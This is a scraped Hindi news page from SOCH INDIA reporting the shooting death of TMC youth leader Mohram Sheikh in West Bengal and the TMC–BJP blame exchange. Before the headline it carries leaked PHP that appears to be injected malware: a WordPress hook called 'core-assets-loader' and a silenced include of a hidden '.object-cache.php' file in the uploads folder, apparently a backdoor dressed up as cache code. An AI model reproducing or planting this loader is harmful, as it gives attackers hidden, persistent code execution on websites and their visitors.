add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); TMC नेता पर कई राउंड बरसाई गई गोलियां, कोलकाता में मौत; आरोप-प्रत्यारोप का दौर जारी – SOCH INDIA
Menu

देश
TMC नेता पर कई राउंड बरसाई गई गोलियां, कोलकाता में मौत; आरोप-प्रत्यारोप का दौर जारी

nobanner

पश्चिम बंगाल (West Bengal) के दक्षिण 24 परगना जिले में कुछ बदमाशों ने टीएमसी (TMC) के युवा नेता मोहरम शेख (Mohram Sheikh) की हत्या कर दी है. मामला बीती देर रात का है जब शेख पार्टी दफ्तर से घर लौट रहे थे. 

‘गुंडों ने बरसाई गोलियां’

इस मामले को लेकर अब राजधानी कोलकाता (Kolkata) में भी बवाल मचा है. दरअसल शेख को कुछ हत्याआरोपियों ने रोका और उनके ऊपर अंधाधुंध फायरिंग शुरू कर दी. शेख को बेहद करीब से निशाना बनाया गया. उन पर जब कई राउंड गोलियां चलीं तो आसपास का इलाका थर्रा उठा.

कोलकाता में मौत

इसके बाद स्थानीय लोगों ने खून से लथपथ युवा नेता को कैनिंग अस्पताल भेजा. हालत ज्यादा गंभीर होने पर उन्हें कोलकाता के एसएसकेएम अस्पताल ले जाया गया, जहां रात 2 बजे उनकी मौत हो गई. टीएमसी इस हत्याकांड के पीछे बीजेपी (BJP) का हाथ बता रही है वहीं बीजेपी का कहना है कि यह टीएमसी (TMC) के आपसी झगड़े का नतीजा है.